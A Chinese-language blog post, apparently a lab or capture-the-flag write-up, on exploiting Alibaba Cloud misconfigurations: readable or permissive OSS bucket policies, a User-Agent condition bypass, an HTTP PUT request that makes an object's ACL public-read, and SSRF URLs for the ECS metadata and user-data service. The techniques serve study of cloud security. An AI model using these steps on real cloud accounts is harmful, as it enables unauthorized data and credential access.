【云安全】以Aliyun为例聊云厂商服务常见利用手段

目录

OSS-bucket_policy_readable

OSS-object_public_access

OSS-bucket_object_traversal

[OSS-Special Bucket Policy](#OSS-Special Bucket Policy)

OSS-unrestricted_file_upload

OSS-object_acl_writable

ECS-SSRF


云攻防场景下对云厂商服务的利用大同小异,下面以阿里云为例

其他如腾讯云、华为云、谷歌云、AWS、Azure不一一列举

OSS-bucket_policy_readable

桶策略可读

?policy可以看到存储桶策略

成功读到flag

OSS-object_public_access

对象公共访问

复制代码
resource "alicloud_oss_bucket_object" "huoxian_terraformgoat_object" {
  bucket     = alicloud_oss_bucket.huoxian_terraformgoat_bucket.bucket
  acl        = "public-read"
  key        = "flag"
  source     = "./flag"
  depends_on = [alicloud_oss_bucket.huoxian_terraformgoat_bucket]
}

访问./flag

OSS-bucket_object_traversal

存储桶对象遍历

复制代码
{
		"Effect": "Allow",
		"Action": [
			"oss:ListObjects",
			"oss:GetObject"
		],
		"Principal": [
			"*"
		],
		"Resource": [
			"acs:oss:*:*:*"
		],
		"Condition": {
			"StringLike": {
          		"oss:Prefix": [
					"*"
				]
			}
		}
	}

OSS-Special Bucket Policy

特殊存储桶策略

复制代码
{
		"Effect": "Allow",
		"Action": [
			"oss:ListObjects",
			"oss:GetObject"
		],
		"Principal": [
			"*"
		],
		"Resource": [
			"acs:oss:*:*:*"
		],
		"Condition": {
			"StringEquals": {
          		"acs:UserAgent": [
					"HxSecurityLab"
				]
			}
		}
	}

默认无权限访问

加上UA头

复制代码
User-Agent: HxSecurityLab

OSS-unrestricted_file_upload

不受限制的文件上传

复制代码
resource "alicloud_oss_bucket_object" "flag" {
  bucket       = alicloud_oss_bucket.Put_bucket_acl.bucket
  key          = "hx.png"
  source       = "./dist/hx.png"
  content_type = "inline"
  acl          = "public-read-write"
}

PUT覆盖原有文件

PUT新建文件

OSS-object_acl_writable

对象ACL可写

复制代码
{
	"Version": "1",
	"Statement": [{
		"Effect": "Allow",
		"Action": [
			"oss:GetObjectAcl",
			"oss:PutObjectAcl"
		],
		"Principal": [
			"*"
		],
		"Resource": [
			"acs:oss:*:*:*/*"
		]
	}]
}

直接访问flag.txt,403

查看acl

通过PUT方法将Object的ACL改为public-read

复制代码
PUT /flag.txt?acl HTTP/1.1
Host: hx-cloud-security-2rr50.oss-cn-beijing.aliyuncs.com
x-oss-object-acl: public-read

看到成功修改

成功读到flag

ECS-SSRF

用户可以通过 SSRF 漏洞获取到 ECS 上的元数据、用户数据等信息。

读取元数据

复制代码
http://100.100.100.200/latest/meta-data/

100.100.100.200 是一个特殊的保留 IP 地址,用于阿里云的元数据服务(Metadata Service)。它允许云服务器实例从内部网络获取自身的元数据,而无需访问外网。

读取用户数据

复制代码
http://100.100.100.200/latest/user-data/

User Data:用户在创建 ECS 时传入的脚本或配置

读flag

复制代码
file:///flag69152201.txt
相关推荐
枷锁—sha6 小时前
【SRC】SQL注入WAF 绕过应对策略(二)
网络·数据库·python·sql·安全·网络安全
天荒地老笑话么13 小时前
静态 IP 规划:掩码/网关/DNS 的正确组合
网络·网络协议·tcp/ip·网络安全
大方子1 天前
【PolarCTF】rce1
网络安全·polarctf
枷锁—sha1 天前
Burp Suite 抓包全流程与 Xray 联动自动挖洞指南
网络·安全·网络安全
聚铭网络1 天前
聚铭网络再度入选2026年度扬州市网络和数据安全服务资源池单位
网络安全
darkb1rd1 天前
八、PHP SAPI与运行环境差异
开发语言·网络安全·php·webshell
世界尽头与你2 天前
(修复方案)基础目录枚举漏洞
安全·网络安全·渗透测试
枷锁—sha2 天前
【SRC】SQL注入快速判定与应对策略(一)
网络·数据库·sql·安全·网络安全·系统安全
liann1193 天前
3.1_网络——基础
网络·安全·web安全·http·网络安全
ESBK20253 天前
第四届移动互联网、云计算与信息安全国际会议(MICCIS 2026)二轮征稿启动,诚邀全球学者共赴学术盛宴
大数据·网络·物联网·网络安全·云计算·密码学·信息与通信